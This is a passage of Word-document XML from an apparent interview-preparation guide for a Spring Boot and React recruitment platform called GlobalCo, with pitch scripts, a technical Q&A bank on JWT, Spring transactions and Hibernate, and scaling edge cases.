        <w:t>Phase 3: Asynchronous Message Broker (Kafka) — Decouple application submissions and notification dispatches using Apache Kafka or AWS SQS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Phase 4: Full-Text Search Engine (Elasticsearch) — Deploy Elasticsearch for fuzzy skill matching and resume text parsing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E3A8A"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>31. Project Interview Master Preparation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>31.1 The 30-Second Elevator Pitch</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Script: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>"GlobalCo is an enterprise recruitment and applicant tracking platform built with Java 21, Spring Boot 3, and React 18. It solves the recruitment black hole by providing a 6-stage applicant tracking pipeline, an automated skill matching algorithm that calculates candidate compatibility in real-time, interview scheduling with Google Meet links, and binding offer generation. I built it with stateless JWT security and clean layered architecture, ensuring high scalability and production reliability."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>31.2 The 1-Minute Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Script: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>"GlobalCo bridges the gap between high-volume hiring teams and skilled software engineers. Traditional platforms suffer from resume overload and lack of feedback. In GlobalCo, we implemented an algorithmic Match Engine that compares candidate competencies against job requirements, weighting technical skills at 50%, experience at 25%, and location at 25%. Recruiters manage vacancies via an interactive ATS pipeline where they can advance candidate stages, schedule Google Meet interviews, and generate formal compensation offers. On the backend, we used Spring Boot 3 with Spring Security 6 for stateless JWT authentication, while the frontend uses React 18 with Vite and Tailwind CSS. The entire system is built on a 3-tier architecture with full unit test coverage."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>31.3 The 2-Minute Architectural Walkthrough</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Script: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>"When architecting GlobalCo, I prioritized decoupling, security, and developer ergonomics. On the backend, I implemented a 3-tier Spring Boot application. Client requests first encounter our Spring Security Filter Chain, where a custom OncePerRequestFilter validates the cryptographic HMAC-SHA256 signature of incoming JWT tokens. Requests are then routed to REST controllers, which delegate to transactional service classes. We used Spring Data JPA and Hibernate for persistence, backed by a normalized 3NF relational schema. To prevent duplicate submissions under race conditions, we enforced a database-level composite UNIQUE constraint on (job_id, candidate_id). On the frontend, I used React 18 with Vite and Tailwind CSS. We implemented a centralized AuthContext for user state, and our Axios client uses request interceptors to attach bearer tokens and response interceptors to auto-evict expired sessions. The system achieved a 100% pass rate across our JUnit 5 test suite and builds with zero errors."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>31.4 The 5-Minute Technical Deep Dive</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Script: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>"GlobalCo is designed as an enterprise recruitment operating system that coordinates three distinct actors: Candidates, Recruiters, and Admins. Let me walk through the technical architecture in detail:</w:t>
        <w:br/>
        <w:br/>
        <w:t>First, Security &amp; Authentication: We use stateless JWT tokens signed with HMAC-SHA256. When a user logs in, AuthService validates credentials against BCrypt password hashes. If valid, JwtUtil issues a signed token containing username, user ID, and GrantedAuthorities. Every subsequent request is intercepted by JwtAuthenticationFilter, which extracts the token, verifies the signature, and sets SecurityContextHolder.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Second, The Business Logic &amp; Match Engine: When a candidate views a job, CandidateProfileService computes a multi-factor compatibility score. It pulls the candidate's skills and the job's required skills, normalizes them, and computes a set intersection using HashSets in O(N+M) time. Combined with experience and location weights, this yields a transparent percentage score.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Third, Transactional Integrity &amp; The ATS Pipeline: When a candidate clicks 'Apply', ApplicationService runs within a @Transactional boundary. It checks for existing applications, saves the Application record in APPLIED status, and dispatches an alert via NotificationService. Recruiters can transition candidates across 7 discrete stages, schedule technical interviews with video conference links, and issue offers.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Fourth, Resilience &amp; Error Handling: We implemented GlobalExceptionHandler with @RestControllerAdvice, converting all runtime exceptions into standardized ApiError envelopes. Our Axios client automatically evicts expired sessions on HTTP 401, providing a seamless user experience."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E3A8A"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>32. Project Technical Q&amp;A (Master Interview Bank)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="200" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Q: Why did you choose JWT over traditional HTTP Session cookies?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">30-Second Interview Response: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>JWTs are completely stateless, meaning the backend doesn't store session data in memory. This allows the application to scale horizontally across multiple server instances without sticky sessions or a shared session store.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">In-Depth Technical Explanation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>With traditional JSESSIONID cookies, the server stores session state in RAM. If you scale to 5 server instances behind an AWS ALB, you either need sticky sessions (which cause uneven load distribution) or a centralized session cache like Redis. JWT embeds the user claims and cryptographic signature directly in the token. Any server holding the secret key can verify the token independently in O(1) time without database or cache lookups.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Exact Implementation in GlobalCo: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>In GlobalCo, JwtUtil.java generates tokens containing the username, user ID, and role authorities. The JwtAuthenticationFilter parses this token on every request and populates Spring's SecurityContextHolder.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Interviewer Follow-Up: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>What is the major drawback of stateless JWT, and how would you fix it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Follow-Up Defense: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>The primary drawback is revocation: if a user logs out or has their account suspended, the JWT remains valid until its expiration timestamp. To fix this in production, we would implement a token blacklist in Redis with a TTL matching the token expiry, checking Redis during the filter chain.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="200" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Q: What is the difference between @Component, @Service, and @Repository in Spring?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">30-Second Interview Response: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>They are all Spring stereotype annotations indicating that a class is a managed Spring Bean. However, @Service and @Repository convey semantic intent and enable specific framework behaviors.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">In-Depth Technical Explanation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>@Component is the generic root stereotype. @Service annotates classes in the business logic layer, indicating where domain operations and transaction boundaries reside. @Repository annotates the data access layer and automatically enables Spring's DataAccessException translation mechanism, translating database-specific SQL exceptions into Spring's unified unchecked exception hierarchy.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Exact Implementation in GlobalCo: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>In GlobalCo, JobService is annotated with @Service and @Transactional, while JobRepository extends JpaRepository and is annotated with @Repository.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="200" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Q: What happens under the hood when you annotate a method with @Transactional?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">30-Second Interview Response: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Spring creates a dynamic CGLIB or JDK proxy around the bean. When the method is invoked, the proxy intercepts the call, begins a database transaction, executes the method, commits if successful, and rolls back if an unchecked RuntimeException occurs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">In-Depth Technical Explanation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Spring's TransactionInterceptor intercepts the method call. It consults the PlatformTransactionManager to obtain a connection from the HikariCP pool and binds it to the current thread via ThreadLocal. If any RuntimeException or Error occurs, the interceptor issues a connection.rollback(). If the method completes normally, connection.commit() is invoked, and the connection is returned to the pool.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Exact Implementation in GlobalCo: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>In ApplicationService.applyForJob(), we use @Transactional to ensure that both the Application entity creation and the Notification record creation either commit together or roll back completely if an error occurs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="200" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Q: What is the Hibernate N+1 query problem, and how do you solve it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">30-Second Interview Response: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>The N+1 problem occurs when fetching an entity with lazy relationships (like Job with Company). One query fetches N jobs, and then Hibernate executes N additional queries to fetch the company for each individual job.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">In-Depth Technical Explanation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>If a query executes 'SELECT * FROM jobs', returning 100 jobs, accessing job.getCompany().getName() in a loop causes Hibernate to trigger 100 individual 'SELECT * FROM companies WHERE id = ?' queries, resulting in 1 + 100 = 101 database queries.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Exact Implementation in GlobalCo: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>In GlobalCo, we solve this in JobRepository using JPQL JOIN FETCH: 'SELECT j FROM Job j JOIN FETCH j.company JOIN FETCH j.category' which loads the entire object graph in a single SQL JOIN query.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="200" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Q: How does your candidate skill matching algorithm work, and what is its computational complexity?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">30-Second Interview Response: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>It extracts candidate skills and job required skills into HashSets, performs a set intersection, and computes the percentage of required skills possessed by the candidate.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">In-Depth Technical Explanation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>The algorithm normalizes all skill strings (trimming whitespace and converting to lowercase). It places candidate skills into a HashSet for O(1) lookups. It then iterates through the job's required skills, counting how many exist in the candidate's set. Score = (matchedCount / totalRequired) * 100. Time complexity is O(N + M) and space complexity is O(N + M).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Exact Implementation in GlobalCo: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Implemented in CandidateProfileService and exposed via GET /api/jobs/{id}/match, returning MatchScoreBreakdownDto with score, matchingSkills, and missingSkills.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E3A8A"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>33. Difficult Follow-Up Questions &amp; Edge Cases</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>33.1 Edge Case: Concurrent Application Submissions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Interviewer Scenario: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>What happens if a candidate double-clicks the 'Apply' button rapidly, sending two simultaneous HTTP requests to /api/jobs/1/apply?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Senior Defense: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>"If handled solely via application code checking 'existsByJobAndCandidate', a race condition can occur where both threads check the database simultaneously, find no existing application, and both insert a record. To guarantee idempotency and prevent duplicates, we enforce a database-level composite UNIQUE constraint on (job_id, candidate_id). If the second thread attempts an insert, the database raises a DataIntegrityViolationException, which our GlobalExceptionHandler catches and converts into a friendly 409 Conflict response without corrupting data."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>33.2 Edge Case: Scalability Under 100,000 Concurrent Users</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Interviewer Scenario: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>How would you re-architect GlobalCo to handle 100,000 concurrent job seekers during a massive recruitment drive?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Senior Defense: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>"First, eliminate database bottlenecks by adding Redis caching with a Cache-Aside pattern for read-heavy endpoints like GET /api/jobs. Second, configure Read Replicas for our database cluster, directing read queries to replicas and writes to the primary master. Third, decouple high-volume writes (like application submissions and notification dispatches) by introducing an Apache Kafka or AWS SQS message queue: the controller acknowledges receipt with a 202 Accepted, and worker services consume messages asynchronously. Fourth, deploy the Spring Boot backend inside Kubernetes pods with Horizontal Pod Autoscaling (HPA) triggered by CPU utilization and request throughput."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E3A8A"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>34. 'If the Interviewer Opens My Code' Survival Guide</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Prepare for line-by-line inspection of your repository source files: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4824"/>
        <w:gridCol w:w="4824"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Interviewer Code Inspection Question</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6048"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Winning Technical Explanation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Why did you create JwtAuthenticationFilter?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6048"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>It intercepts every incoming HTTP request once (OncePerRequestFilter), parses the Bearer JWT token from the Authorization header, validates its cryptographic signature, and loads the user into Spring Security's SecurityContextHolder.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Why is @Transactional placed on ApplicationService methods?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6048"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Because creating an application involves multiple database writes (inserting into applications and inserting into notifications). @Transactional ensures that if the notification fails, the application insert is also rolled back, maintaining database consistency.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Why did you use @RestControllerAdvice instead of try-catch in every controller?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
